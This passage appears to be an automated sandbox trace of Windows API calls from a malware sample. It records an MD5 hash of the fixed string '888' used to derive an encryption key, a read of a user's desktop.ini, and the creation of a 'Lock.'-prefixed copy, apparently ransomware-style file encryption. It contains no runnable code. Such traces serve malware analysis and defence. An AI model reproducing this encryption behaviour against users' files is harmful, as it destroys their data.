hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.550] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.550] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.551] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.551] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.551] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.552] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c198) returned 1 [0212.552] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.553] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.553] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.554] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.554] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.554] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab518, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.554] CryptCreateHash (in: hProv=0xa7c198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.554] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.554] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.554] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab6c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.555] CryptHashData (hHash=0x9e2078, pbData=0x2a72628, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.555] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.555] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.555] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.555] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab440, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.555] CryptDeriveKey (in: hProv=0xa7c198, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ab8) returned 1 [0212.555] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.555] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.556] CryptDestroyHash (hHash=0x9e2078) returned 1 [0212.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.558] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.558] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0212.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0212.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0212.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.560] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0212.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0212.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0212.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0212.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0212.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0212.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e9020 [0212.568] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.569] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0212.570] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75160 [0212.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e9020 | out: hHeap=0x2af0000) returned 1 [0212.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75360 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.577] PeekMessageW (in: 